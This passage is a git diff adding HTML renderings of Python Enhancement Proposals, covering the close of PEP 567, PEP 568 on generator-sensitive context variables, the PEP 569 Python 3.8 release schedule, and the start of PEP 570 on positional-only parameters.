  1. ContextVar objects do not have __module__ and +__qualname__ attributes, making straightforward pickling +of Context objects impossible. This is solvable by modifying +the API to either auto detect the module where a context variable +is defined, or by adding a new keyword-only “module” parameter +to ContextVar constructor.
  2. +
  3. Not all context variables refer to picklable objects. Making a +ContextVar picklable must be an opt-in.
  4. +
+

Given the time frame of the Python 3.7 release schedule it was decided +to defer this proposal to Python 3.8.

+
+
+

Making Context a MutableMapping

+

Making the Context class implement the abc.MutableMapping +interface would mean that it is possible to set and unset variables +using Context[var] = value and del Context[var] operations.

+

This proposal was deferred to Python 3.8+ because of the following:

+
    +
  1. If in Python 3.8 it is decided that generators should support +context variables (see PEP 550 and PEP 568), then Context +would be transformed into a chain-map of context variables mappings +(as every generator would have its own mapping). That would make +mutation operations like Context.__delitem__ confusing, as +they would operate only on the topmost mapping of the chain.
  2. +
  3. Having a single way of mutating the context +(ContextVar.set() and ContextVar.reset() methods) makes +the API more straightforward.

    For example, it would be non-obvious why the below code fragment +does not work as expected:

    +
    var = ContextVar('var')
    +
    +ctx = copy_context()
    +ctx[var] = 'value'
    +print(ctx[var])  # Prints 'value'
    +
    +print(var.get())  # Raises a LookupError
    +
    +
    +

    While the following code would work:

    +
    ctx = copy_context()
    +
    +def func():
    +    ctx[var] = 'value'
    +
    +    # Contrary to the previous example, this would work
    +    # because 'func()' is running within 'ctx'.
    +    print(ctx[var])
    +    print(var.get())
    +
    +ctx.run(func)
    +
    +
    +
  4. +
  5. If Context was mutable it would mean that context variables +could be mutated separately (or concurrently) from the code that +runs within the context. That would be similar to obtaining a +reference to a running Python frame object and modifying its +f_locals from another OS thread. Having one single way to +assign values to context variables makes contexts conceptually +simpler and more predictable, while keeping the door open for +future performance optimizations.
  6. +
+
+
+

Having initial values for ContextVars

+

Nathaniel Smith proposed to have a required initial_value +keyword-only argument for the ContextVar constructor.

+

The main argument against this proposal is that for some types +there is simply no sensible “initial value” except None. +E.g. consider a web framework that stores the current HTTP +request object in a context variable. With the current semantics +it is possible to create a context variable without a default value:

+
# Framework:
+current_request: ContextVar[Request] = \
+    ContextVar('current_request')
+
+
+# Later, while handling an HTTP request:
+request: Request = current_request.get()
+
+# Work with the 'request' object:
+return request.method
+
+
+

Note that in the above example there is no need to check if +request is None. It is simply expected that the framework +always sets the current_request variable, or it is a bug (in +which case current_request.get() would raise a LookupError).

+

If, however, we had a required initial value, we would have +to guard against None values explicitly:

+
# Framework:
+current_request: ContextVar[Optional[Request]] = \
+    ContextVar('current_request', initial_value=None)
+
+
+# Later, while handling an HTTP request:
+request: Optional[Request] = current_request.get()
+
+# Check if the current request object was set:
+if request is None:
+    raise RuntimeError
+
+# Work with the 'request' object:
+return request.method
+
+
+

Moreover, we can loosely compare context variables to regular +Python variables and to threading.local() objects. Both +of them raise errors on failed lookups (NameError and +AttributeError respectively).

+
+
+
+

Backwards Compatibility

+

This proposal preserves 100% backwards compatibility.

+

Libraries that use threading.local() to store context-related +values, currently work correctly only for synchronous code. Switching +them to use the proposed API will keep their behavior for synchronous +code unmodified, but will automatically enable support for +asynchronous code.

+
+
+

Examples

+
+

Converting code that uses threading.local()

+

A typical code fragment that uses threading.local() usually +looks like the following:

+
class PrecisionStorage(threading.local):
+    # Subclass threading.local to specify a default value.
+    value = 0.0
+
+precision = PrecisionStorage()
+
+# To set a new precision:
+precision.value = 0.5
+
+# To read the current precision:
+print(precision.value)
+
+
+

Such code can be converted to use the contextvars module:

+
precision = contextvars.ContextVar('precision', default=0.0)
+
+# To set a new precision:
+precision.set(0.5)
+
+# To read the current precision:
+print(precision.get())
+
+
+
+
+

Offloading execution to other threads

+

It is possible to run code in a separate OS thread using a copy +of the current thread context:

+
executor = ThreadPoolExecutor()
+current_context = contextvars.copy_context()
+
+executor.submit(current_context.run, some_function)
+
+
+
+
+
+

Reference Implementation

+

The reference implementation can be found here: [3]. +See also issue 32436 [4].

+
+
+

Acceptance

+

PEP 567 was accepted by Guido on Monday, January 22, 2018 [5]. +The reference implementation was merged on the same day.

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Nathaniel Smith, Victor Stinner, +Elvis Pranskevichus, Alyssa Coghlan, Antoine Pitrou, INADA Naoki, +Paul Moore, Eric Snow, Greg Ewing, and many others for their feedback, +ideas, edits, criticism, code reviews, and discussions around +this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0567.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0568/index.html b/pep-0568/index.html new file mode 100644 index 00000000000..b4e71f13186 --- /dev/null +++ b/pep-0568/index.html @@ -0,0 +1,476 @@ + + + + + + + + PEP 568 – Generator-sensitivity for Context Variables | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 568 – Generator-sensitivity for Context Variables

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2018
+
Python-Version:
+
3.8
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Context variables provide a generic mechanism for tracking dynamic, +context-local state, similar to thread-local storage but generalized +to cope work with other kinds of thread-like contexts, such as asyncio +Tasks. PEP 550 proposed a mechanism for context-local state that was +also sensitive to generator context, but this was pretty complicated, +so the BDFL requested it be simplified. The result was PEP 567, which +is targeted for inclusion in 3.7. This PEP then extends PEP 567’s +machinery to add generator context sensitivity.

+

This PEP is starting out in the “deferred” status, because there isn’t +enough time to give it proper consideration before the 3.7 feature +freeze. The only goal right now is to understand what would be +required to add generator context sensitivity in 3.8, so that we can +avoid shipping something in 3.7 that would rule it out by accident. +(Ruling it out on purpose can wait until 3.8 ;-).)

+
+
+

Rationale

+

[Currently the point of this PEP is just to understand how this +would work, with discussion of whether it’s a good idea deferred +until after the 3.7 feature freeze. So rationale is TBD.]

+
+
+

High-level summary

+

Instead of holding a single Context, the threadstate now holds a +ChainMap of Contexts. ContextVar.get and +ContextVar.set are backed by the ChainMap. Generators and +async generators each have an associated Context that they push +onto the ChainMap while they’re running to isolate their +context-local changes from their callers, though this can be +overridden in cases like @contextlib.contextmanager where +“leaking” context changes from the generator into its caller is +desirable.

+
+
+

Specification

+
+

Review of PEP 567

+

Let’s start by reviewing how PEP 567 works, and then in the next +section we’ll describe the differences.

+

In PEP 567, a Context is a Mapping from ContextVar objects +to arbitrary values. In our pseudo-code here we’ll pretend that it +uses a dict for backing storage. (The real implementation uses a +HAMT, which is semantically equivalent to a dict but with +different performance trade-offs.):

+
class Context(collections.abc.Mapping):
+    def __init__(self):
+        self._data = {}
+        self._in_use = False
+
+    def __getitem__(self, key):
+        return self._data[key]
+
+    def __iter__(self):
+        return iter(self._data)
+
+    def __len__(self):
+        return len(self._data)
+
+
+

At any given moment, the threadstate holds a current Context +(initialized to an empty Context when the threadstate is created); +we can use Context.run to temporarily switch the current +Context:

+
# Context.run
+def run(self, fn, *args, **kwargs):
+    if self._in_use:
+        raise RuntimeError("Context already in use")
+    tstate = get_thread_state()
+    old_context = tstate.current_context
+    tstate.current_context = self
+    self._in_use = True
+    try:
+        return fn(*args, **kwargs)
+    finally:
+        state.current_context = old_context
+        self._in_use = False
+
+
+

We can fetch a shallow copy of the current Context by calling +copy_context; this is commonly used when spawning a new task, so +that the child task can inherit context from its parent:

+
def copy_context():
+    tstate = get_thread_state()
+    new_context = Context()
+    new_context._data = dict(tstate.current_context)
+    return new_context
+
+
+

In practice, what end users generally work with is ContextVar +objects, which also provide the only way to mutate a Context. They +work with a utility class Token, which can be used to restore a +ContextVar to its previous value:

+
class Token:
+    MISSING = sentinel_value()
+
+    # Note: constructor is private
+    def __init__(self, context, var, old_value):
+        self._context = context
+        self.var = var
+        self.old_value = old_value
+
+    # XX: PEP 567 currently makes this a method on ContextVar, but
+    # I'm going to propose it switch to this API because it's simpler.
+    def reset(self):
+        # XX: should we allow token reuse?
+        # XX: should we allow tokens to be used if the saved
+        # context is no longer active?
+        if self.old_value is self.MISSING:
+            del self._context._data[self.context_var]
+        else:
+            self._context._data[self.context_var] = self.old_value
+
+# XX: the handling of defaults here uses the simplified proposal from
+# https://mail.python.org/pipermail/python-dev/2018-January/151596.html
+# This can be updated to whatever we settle on, it was just less
+# typing this way :-)
+class ContextVar:
+    def __init__(self, name, *, default=None):
+        self.name = name
+        self.default = default
+
+    def get(self):
+        context = get_thread_state().current_context
+        return context.get(self, self.default)
+
+    def set(self, new_value):
+        context = get_thread_state().current_context
+        token = Token(context, self, context.get(self, Token.MISSING))
+        context._data[self] = new_value
+        return token
+
+
+
+
+

Changes from PEP 567 to this PEP

+

In general, Context remains the same. However, now instead of +holding a single Context object, the threadstate stores a stack of +them. This stack acts just like a collections.ChainMap, so we’ll +use that in our pseudocode. Context.run then becomes:

+
# Context.run
+def run(self, fn, *args, **kwargs):
+    if self._in_use:
+        raise RuntimeError("Context already in use")
+    tstate = get_thread_state()
+    old_context_stack = tstate.current_context_stack
+    tstate.current_context_stack = ChainMap([self])     # changed
+    self._in_use = True
+    try:
+        return fn(*args, **kwargs)
+    finally:
+        state.current_context_stack = old_context_stack
+        self._in_use = False
+
+
+

Aside from some updated variables names (e.g., +tstate.current_contexttstate.current_context_stack), the +only change here is on the marked line, which now wraps the context in +a ChainMap before stashing it in the threadstate.

+

We also add a Context.push method, which is almost exactly like +Context.run, except that it temporarily pushes the Context +onto the existing stack, instead of temporarily replacing the whole +stack:

+
# Context.push
+def push(self, fn, *args, **kwargs):
+    if self._in_use:
+        raise RuntimeError("Context already in use")
+    tstate = get_thread_state()
+    tstate.current_context_stack.maps.insert(0, self)  # different from run
+    self._in_use = True
+    try:
+        return fn(*args, **kwargs)
+    finally:
+        tstate.current_context_stack.maps.pop(0)       # different from run
+        self._in_use = False
+
+
+

In most cases, we don’t expect push to be used directly; instead, +it will be used implicitly by generators. Specifically, every +generator object and async generator object gains a new attribute +.context. When an (async) generator object is created, this +attribute is initialized to an empty Context (self.context = +Context()). This is a mutable attribute; it can be changed by user +code. But trying to set it to anything that isn’t a Context object +or None will raise an error.

+

Whenever we enter an generator via __next__, send, throw, +or close, or enter an async generator by calling one of those +methods on its __anext__, asend, athrow, or aclose +coroutines, then its .context attribute is checked, and if +non-None, is automatically pushed:

+
# GeneratorType.__next__
+def __next__(self):
+    if self.context is not None:
+        return self.context.push(self.__real_next__)
+    else:
+        return self.__real_next__()
+
+
+

While we don’t expect people to use Context.push often, making it +a public API preserves the principle that a generator can always be +rewritten as an explicit iterator class with equivalent semantics.

+

Also, we modify contextlib.(async)contextmanager to always set its +(async) generator objects’ .context attribute to None:

+
# contextlib._GeneratorContextManagerBase.__init__
+def __init__(self, func, args, kwds):
+    self.gen = func(*args, **kwds)
+    self.gen.context = None                  # added
+    ...
+
+
+

This makes sure that code like this continues to work as expected:

+
@contextmanager
+def decimal_precision(prec):
+    with decimal.localcontext() as ctx:
+        ctx.prec = prec
+        yield
+
+with decimal_precision(2):
+    ...
+
+
+

The general idea here is that by default, every generator object gets +its own local context, but if users want to explicitly get some other +behavior then they can do that.

+

Otherwise, things mostly work as before, except that we go through and +swap everything to use the threadstate ChainMap instead of the +threadstate Context. In full detail:

+

The copy_context function now returns a flattened copy of the +“effective” context. (As an optimization, the implementation might +choose to do this flattening lazily, but if so this will be made +invisible to the user.) Compared to our previous implementation above, +the only change here is that tstate.current_context has been +replaced with tstate.current_context_stack:

+
def copy_context() -> Context:
+    tstate = get_thread_state()
+    new_context = Context()
+    new_context._data = dict(tstate.current_context_stack)
+    return new_context
+
+
+

Token is unchanged, and the changes to ContextVar.get are +trivial:

+
# ContextVar.get
+def get(self):
+    context_stack = get_thread_state().current_context_stack
+    return context_stack.get(self, self.default)
+
+
+

ContextVar.set is a little more interesting: instead of going +through the ChainMap machinery like everything else, it always +mutates the top Context in the stack, and – crucially! – sets up +the returned Token to restore its state later. This allows us to +avoid accidentally “promoting” values between different levels in the +stack, as would happen if we did old = var.get(); ...; +var.set(old):

+
# ContextVar.set
+def set(self, new_value):
+    top_context = get_thread_state().current_context_stack.maps[0]
+    token = Token(top_context, self, top_context.get(self, Token.MISSING))
+    top_context._data[self] = new_value
+    return token
+
+
+

And finally, to allow for introspection of the full context stack, we +provide a new function contextvars.get_context_stack:

+
def get_context_stack() -> List[Context]:
+    return list(get_thread_state().current_context_stack.maps)
+
+
+

That’s all.

+
+
+
+

Comparison to PEP 550

+

The main difference from PEP 550 is that it reified what we’re calling +“contexts” and “context stacks” as two different concrete types +(LocalContext and ExecutionContext respectively). This led to +lots of confusion about what the differences were, and which object +should be used in which places. This proposal simplifies things by +only reifying the Context, which is “just a dict”, and makes the +“context stack” an unnamed feature of the interpreter’s runtime state +– though it is still possible to introspect it using +get_context_stack, for debugging and other purposes.

+
+
+

Implementation notes

+

Context will continue to use a HAMT-based mapping structure under +the hood instead of dict, since we expect that calls to +copy_context are much more common than ContextVar.set. In +almost all cases, copy_context will find that there’s only one +Context in the stack (because it’s rare for generators to spawn +new tasks), and can simply re-use it directly; in other cases HAMTs +are cheap to merge and this can be done lazily.

+

Rather than using an actual ChainMap object, we’ll represent the +context stack using some appropriate structure – the most appropriate +options are probably either a bare list with the “top” of the +stack being the end of the list so we can use push/pop, or +else an intrusive linked list (PyThreadStateContext → +Context → …), with the “top” of the stack at the beginning of +the list to allow efficient push/pop.

+

A critical optimization in PEP 567 is the caching of values inside +ContextVar. Switching from a single context to a context stack +makes this a little bit more complicated, but not too much. Currently, +we invalidate the cache whenever the threadstate’s current Context +changes (on thread switch, and when entering/exiting Context.run). +The simplest approach here would be to invalidate the cache whenever +stack changes (on thread switch, when entering/exiting +Context.run, and when entering/leaving Context.push). The main +effect of this is that iterating a generator will invalidate the +cache. It seems unlikely that this will cause serious problems, but if +it does, then I think it can be avoided with a cleverer cache key that +recognizes that pushing and then popping a Context returns the +threadstate to its previous state. (Idea: store the cache key for a +particular stack configuration in the topmost Context.)

+

It seems unavoidable in this design that uncached get will be +O(n), where n is the size of the context stack. However, n will +generally be very small – it’s roughly the number of nested +generators, so usually n=1, and it will be extremely rare to see n +greater than, say, 5. At worst, n is bounded by the recursion limit. +In addition, we can expect that in most cases of deep generator +recursion, most of the Contexts in the stack will be empty, and +thus can be skipped extremely quickly during lookup. And for repeated +lookups the caching mechanism will kick in. So it’s probably possible +to construct some extreme case where this causes performance problems, +but ordinary code should be essentially unaffected.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0568.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0569/index.html b/pep-0569/index.html new file mode 100644 index 00000000000..d5eca141160 --- /dev/null +++ b/pep-0569/index.html @@ -0,0 +1,266 @@ + + + + + + + + PEP 569 – Python 3.8 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 569 – Python 3.8 Release Schedule

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
27-Jan-2018
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.8. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.8 Release Manager: Łukasz Langa
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

3.8 Lifespan

+

3.8 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.9.0 final, +the ninth and final 3.8 bugfix update was released. After that, +security updates (source only) were released for 5 years until the +release of Python 3.13.0 final.

+

As of 2024-10-07, 3.8 has reached the +end-of-life phase +of its release cycle. 3.8.20 was the final security release. +The codebase for 3.8 is now frozen and no further updates will be +provided nor issues of any kind will be accepted on the bug tracker.

+
+
+

Release Schedule

+
+

3.8.0 schedule

+
    +
  • 3.8 development begins: Monday, 2018-01-29
  • +
  • 3.8.0 alpha 1: Sunday, 2019-02-03
  • +
  • 3.8.0 alpha 2: Monday, 2019-02-25
  • +
  • 3.8.0 alpha 3: Monday, 2019-03-25
  • +
  • 3.8.0 alpha 4: Monday, 2019-05-06
  • +
  • 3.8.0 beta 1: Tuesday, 2019-06-04 +(No new features beyond this point.)
  • +
  • 3.8.0 beta 2: Thursday, 2019-07-04
  • +
  • 3.8.0 beta 3: Monday, 2019-07-29
  • +
  • 3.8.0 beta 4: Friday, 2019-08-30
  • +
  • 3.8.0 candidate 1: Tuesday, 2019-10-01
  • +
  • 3.8.0 final: Monday, 2019-10-14
  • +
+
+
+

Bugfix releases

+
    +
  • 3.8.1rc1: Tuesday, 2019-12-10
  • +
  • 3.8.1: Wednesday, 2019-12-18
  • +
  • 3.8.2rc1: Monday, 2020-02-10
  • +
  • 3.8.2rc2: Monday, 2020-02-17
  • +
  • 3.8.2: Monday, 2020-02-24
  • +
  • 3.8.3rc1: Wednesday, 2020-04-29
  • +
  • 3.8.3: Wednesday, 2020-05-13
  • +
  • 3.8.4rc1: Tuesday, 2020-06-30
  • +
  • 3.8.4: Monday, 2020-07-13
  • +
  • 3.8.5: Monday, 2020-07-20 (security hotfix)
  • +
  • 3.8.6rc1: Tuesday, 2020-09-08
  • +
  • 3.8.6: Thursday, 2020-09-24
  • +
  • 3.8.7rc1: Monday, 2020-12-07
  • +
  • 3.8.7: Monday, 2020-12-21
  • +
  • 3.8.8rc1: Tuesday, 2021-02-16
  • +
  • 3.8.8: Friday, 2021-02-19
  • +
  • 3.8.9: Friday, 2021-04-02 (security hotfix)
  • +
  • 3.8.10: Monday, 2021-05-03 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 7th 2024.

+
    +
  • 3.8.11: Monday, 2021-06-28
  • +
  • 3.8.12: Monday, 2021-08-30
  • +
  • 3.8.13: Wednesday, 2022-03-16
  • +
  • 3.8.14: Tuesday, 2022-09-06
  • +
  • 3.8.15: Tuesday, 2022-10-11
  • +
  • 3.8.16: Tuesday, 2022-12-06
  • +
  • 3.8.17: Tuesday, 2023-06-06
  • +
  • 3.8.18: Thursday, 2023-08-24
  • +
  • 3.8.19: Tuesday, 2024-03-19
  • +
  • 3.8.20: Friday, 2024-09-06 (final security release)
  • +
+
+
+
+

Features for 3.8

+

Some of the notable features of Python 3.8 include:

+
    +
  • PEP 570, Positional-only arguments
  • +
  • PEP 572, Assignment Expressions
  • +
  • PEP 574, Pickle protocol 5 with out-of-band data
  • +
  • PEP 578, Runtime audit hooks
  • +
  • PEP 587, Python Initialization Configuration
  • +
  • PEP 590, Vectorcall: a fast calling protocol for CPython
  • +
  • Typing-related: PEP 591 (Final qualifier), PEP 586 (Literal types), +and PEP 589 (TypedDict)
  • +
  • Parallel filesystem cache for compiled bytecode
  • +
  • Debug builds share ABI as release builds
  • +
  • f-strings support a handy = specifier for debugging
  • +
  • continue is now legal in finally: blocks
  • +
  • on Windows, the default asyncio event loop is now +ProactorEventLoop
  • +
  • on macOS, the spawn start method is now used by default in +multiprocessing
  • +
  • multiprocessing can now use shared memory segments to avoid +pickling costs between processes
  • +
  • typed_ast is merged back to CPython
  • +
  • LOAD_GLOBAL is now 40% faster
  • +
  • pickle now uses Protocol 4 by default, improving performance
  • +
+

There are many other interesting changes, please consult the +“What’s New” page in the documentation for a full list.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0569.rst

+

Last modified: 2024-10-07 17:56:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0570/index.html b/pep-0570/index.html new file mode 100644 index 00000000000..fdce17ea7bd --- /dev/null +++ b/pep-0570/index.html @@ -0,0 +1,1022 @@ + + + + + + + + PEP 570 – Python Positional-Only Parameters | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 570 – Python Positional-Only Parameters

+
+
Author:
+
Larry Hastings <larry at hastings.org>, +Pablo Galindo <pablogsal at python.org>, +Mario Corchero <mariocj89 at gmail.com>, +Eric N. Vander Weele <ericvw at gmail.com>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Jan-2018
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to introduce a new syntax, /, for specifying +positional-only parameters in Python function definitions.

+

Positional-only parameters have no externally-usable name. When a function +accepting positional-only parameters is called, positional arguments are mapped +to these parameters based solely on their order.

+

When designing APIs (application programming interfaces), library +authors try to ensure correct and intended usage of an API. Without the ability to +specify which parameters are positional-only, library authors must be careful +when choosing appropriate parameter names. This care must be taken +even for required parameters or when the parameters +have no external semantic meaning for callers of the API.

+

In this PEP, we discuss:

+
    +
  • Python’s history and current semantics for positional-only parameters
  • +
  • the problems encountered by not having them
  • +
  • how these problems are handled without language-intrinsic support for +positional-only parameters
  • +
  • the benefits of having positional-only parameters
  • +
+

Within context of the motivation, we then:

+
    +
  • discuss why positional-only parameters should be a feature intrinsic to the +language
  • +
  • propose the syntax for marking positional-only parameters
  • +
  • present how to teach this new feature
  • +
  • note rejected ideas in further detail
  • +
+
+
+

Motivation

+
+

History of Positional-Only Parameter Semantics in Python

+

Python originally supported positional-only parameters. Early versions of the +language lacked the ability to call functions with arguments bound to parameters +by name. Around Python 1.0, parameter semantics changed to be +positional-or-keyword. Since then, users have been able to provide arguments +to a function either positionally or by the keyword name specified in the +function’s definition.

+

In current versions of Python, many CPython “builtin” and standard library +functions only accept positional-only parameters. The resulting semantics can be +easily observed by calling one of these functions using keyword arguments:

+
>>> help(pow)
+...
+pow(x, y, z=None, /)
+...
+
+>>> pow(x=5, y=3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: pow() takes no keyword arguments
+
+
+

pow() expresses that its parameters are positional-only via the +/ marker. However, this is only a documentation convention; Python +developers cannot use this syntax in code.

+

There are functions with other interesting semantics:

+
    +
  • range(), an overloaded function, accepts an optional parameter to the +left of its required parameter. [4]
  • +
  • dict(), whose mapping/iterator parameter is optional and semantically +must be positional-only. Any externally visible name for this parameter +would occlude that name going into the **kwarg keyword variadic parameter +dict. [3]
  • +
+

One can emulate these semantics in Python code by accepting +(*args, **kwargs) and parsing the arguments manually. However, this results +in a disconnect between the function definition and what the function +contractually accepts. The function definition does not match the logic of the +argument handling.

+

Additionally, the / syntax is used beyond CPython for specifying similar +semantics (i.e., [1] [2]); thus, indicating that +these scenarios are not exclusive to CPython and the standard library.

+
+
+

Problems Without Positional-Only Parameters

+

Without positional-only parameters, there are challenges for library authors +and users of APIs. The following subsections outline the problems +encountered by each entity.

+
+

Challenges for Library Authors

+

With positional-or-keyword parameters, the mix of calling conventions is not +always desirable. Authors may want to restrict usage of an API by disallowing +calling the API with keyword arguments, which exposes the name of the parameter when +part of the public API. This approach is especially useful for required function +parameters that already have semantic meaning (e.g, +namedtuple(typenames, field_names, …) or when the parameter name has no +true external meaning (e.g., arg1, arg2, …, etc for min()). If a +caller of an API starts using a keyword argument, the library author cannot rename +the parameter because it would be a breaking change.

+

Positional-only parameters can be emulated by extracting arguments from +*args one by one. However, this approach is error-prone and is not +synonymous with the function definition, as previously mentioned. The usage of +the function is ambiguous and forces users to look at help(), the +associated auto-generated documentation, or source code to understand what +parameters the function contractually accepts.

+
+
+

Challenges for Users of an API

+

Users may be surprised when first encountering positional-only notation. This +is expected given that it has only recently been documented +[13] and it is not possible to use in Python code. For +these reasons, this notation is currently an outlier that appears only in +CPython APIs developed in C. Documenting the notation and making it possible +to use it in Python code would eliminate this disconnect.

+

Furthermore, the current documentation for positional-only parameters is inconsistent:

+
    +
  • Some functions denote optional groups of positional-only parameters by +enclosing them in nested square brackets. [5]
  • +
  • Some functions denote optional groups of positional-only parameters by +presenting multiple prototypes with varying numbers of parameters. +[6]
  • +
  • Some functions use both of the above approaches. [4] [7]
  • +
+

Another point the current documentation does not distinguish is +whether a function takes positional-only parameters. open() accepts keyword +arguments; however, ord() does not — there is no way of telling just by +reading the existing documentation.

+
+
+
+

Benefits of Positional-Only Parameters

+

Positional-only parameters give more control to library authors to better +express the intended usage of an API and allows the API to evolve in a safe, +backward-compatible way. Additionally, it makes the Python language more +consistent with existing documentation and the behavior of various +“builtin” and standard library functions.

+
+

Empowering Library Authors

+

Library authors would have the flexibility to change the name of +positional-only parameters without breaking callers. This flexibility reduces the +cognitive burden for choosing an appropriate public-facing name for required +parameters or parameters that have no true external semantic meaning.

+

Positional-only parameters are useful in several situations such as:

+
    +
  • when a function accepts any keyword argument but also can accept a positional one
  • +
  • when a parameter has no external semantic meaning
  • +
  • when an API’s parameters are required and unambiguous
  • +
+

A key +scenario is when a function accepts any keyword argument but can also accepts a +positional one. Prominent examples are Formatter.format and +dict.update. For instance, dict.update accepts a dictionary +(positionally), an iterable of key/value pairs (positionally), or multiple +keyword arguments. In this scenario, if the dictionary parameter were not +positional-only, the user could not use the name that the function definition +uses for the parameter or, conversely, the function could not distinguish +easily if the argument received is the dictionary/iterable or a keyword +argument for updating the key/value pair.

+

Another scenario where positional-only parameters are useful is when the +parameter name has no true external semantic meaning. For example, let’s say +we want to create a function that converts from one type to another:

+
def as_my_type(x):
+    ...
+
+
+

The name of the parameter provides no intrinsic value and forces the API author +to maintain its name forever since callers might pass x as a keyword +argument.

+

Additionally, positional-only parameters are useful when an API’s parameters +are required and is unambiguous with respect to function. For example:

+
def add_to_queue(item: QueueItem):
+    ...
+
+
+

The name of the function makes clear the argument expected. A keyword +argument provides minimal benefit and also limits the future evolution of the +API. Say at a later time we want this function to be able to take multiple +items, while preserving backwards compatibility:

+
def add_to_queue(items: Union[QueueItem, List[QueueItem]]):
+    ...
+
+
+

or to take them by using argument lists:

+
def add_to_queue(*items: QueueItem):
+    ...
+
+
+

the author would be forced to always keep the original parameter name to avoid +potentially breaking callers.

+

By being able to specify positional-only parameters, an author can change the +name of the parameters freely or even change them to *args, as seen in the +previous example. There are multiple function definitions in the standard +library which fall into this category. For example, the required parameter to +collections.defaultdict (called default_factory in its documentation) can +only be passed positionally. One special case of this situation is the self +parameter for class methods: it is undesirable that a caller can bind by +keyword to the name self when calling the method from the class:

+
io.FileIO.write(self=f, b=b"data")
+
+
+

Indeed, function definitions from the standard library implemented in C usually +take self as a positional-only parameter:

+
>>> help(io.FileIO.write)
+Help on method_descriptor:
+
+write(self, b, /)
+    Write buffer b to file, return number of bytes written.
+
+
+
+
+

Improving Language Consistency

+

The Python language would be more consistent with positional-only +parameters. If the concept is a normal feature of Python rather than a feature +exclusive to extension modules, it would reduce confusion for users +encountering functions with positional-only parameters. Some major +third-party packages are already using the / notation in their function +definitions [1] [2].

+

Bridging the gap found between “builtin” functions which +specify positional-only parameters and pure Python implementations that lack +the positional syntax would improve consistency. The / syntax is already exposed +in the existing documentation such as when builtins and interfaces are generated +by the argument clinic.

+

Another essential aspect to consider is PEP 399, which mandates that +pure Python versions of modules in the standard library must have the same +interface and semantics that the accelerator modules implemented in C. For +example, if collections.defaultdict were to have a pure Python +implementation it would need to make use of positional-only parameters to match +the interface of its C counterpart.

+
+
+
+
+

Rationale

+

We propose to introduce positional-only parameters as a new syntax to the +Python language.

+

The new syntax will enable library authors to further control how their API +can be called. It will allow designating which parameters must be called as +positional-only, while preventing them from being called as keyword arguments.

+

Previously, (informational) PEP 457 defined the syntax, but with a much more vague +scope. This PEP takes the original proposal a step further by justifying +the syntax and providing an implementation for the / syntax in function +definitions.

+
+

Performance

+

In addition to the aforementioned benefits, the parsing and handling of +positional-only arguments is faster. This performance benefit can be +demonstrated in this thread about converting keyword arguments to positional: +[11]. Due to this speedup, there has been a recent +trend towards moving builtins away from keyword arguments: recently, +backwards-incompatible changes were made to disallow keyword arguments to +bool, float, list, int, tuple.

+
+
+

Maintainability

+

Providing a way to specify positional-only parameters in Python will make it +easier to maintain pure Python implementations of C modules. Additionally, +library authors defining functions will have the choice for choosing +positional-only parameters if they determine that passing a keyword argument +provides no additional clarity.

+

This is a well discussed, recurring topic on the Python mailing lists:

+ +
+
+

Logical ordering

+

Positional-only parameters also have the (minor) benefit of enforcing some +logical order when calling interfaces that make use of them. For example, the +range function takes all its parameters positionally and disallows forms +like:

+
range(stop=5, start=0, step=2)
+range(stop=5, step=2, start=0)
+range(step=2, start=0, stop=5)
+range(step=2, stop=5, start=0)
+
+
+

at the price of disallowing the use of keyword arguments for the (unique) +intended order:

+
range(start=0, stop=5, step=2)
+
+
+
+
+

Compatibility for Pure Python and C Modules

+

Another critical motivation for positional-only parameters is PEP 399: +Pure Python/C Accelerator Module Compatibility Requirements. This +PEP states that:

+
+
This PEP requires that in these instances that the C code must pass the +test suite used for the pure Python code to act as much as a drop-in +replacement as reasonably possible
+

If the C code is implemented using the existing capabilities +to implement positional-only parameters using the argument clinic, and related +machinery, it is not possible for the pure Python counterpart to match the +provided interface and requirements. This creates a disparity between the +interfaces of some functions and classes in the CPython standard library and +other Python implementations. For example:

+
$ python3 # CPython 3.7.2
+>>> import binascii; binascii.crc32(data=b'data')
+TypeError: crc32() takes no keyword arguments
+
+$ pypy3 # PyPy 6.0.0
